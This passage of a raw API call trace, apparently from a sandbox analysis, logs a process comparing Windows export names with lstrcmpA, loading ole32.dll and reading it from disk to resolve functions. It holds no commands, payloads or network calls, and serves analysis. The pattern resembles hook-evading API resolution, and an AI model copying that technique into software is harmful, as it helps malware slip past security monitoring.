(lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0222.033] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0222.034] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0222.034] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0222.034] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0222.635] GetProcessHeap () returned 0x550000 [0222.635] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d62010 | out: hHeap=0x550000) returned 1 [0222.642] GetProcessHeap () returned 0x550000 [0222.642] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569090 [0222.643] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0222.643] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0222.643] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0222.643] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0222.643] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0222.644] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0222.644] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0222.644] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0222.644] GetProcessHeap () returned 0x550000 [0222.644] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x142d00) returned 0x412c040 [0222.647] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0222.647] ReadFile (in: hFile=0x140, lpBuffer=0x412c040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x412c040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0222.925] CloseHandle (hObject=0x140) returned 1 [0222.926] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0222.926] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0222.927] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0222.927] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0222.928] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0222.929] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0222.930] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0222.931] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0222.931] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0222.931] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0222.931] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0222.932] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0222.932] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") 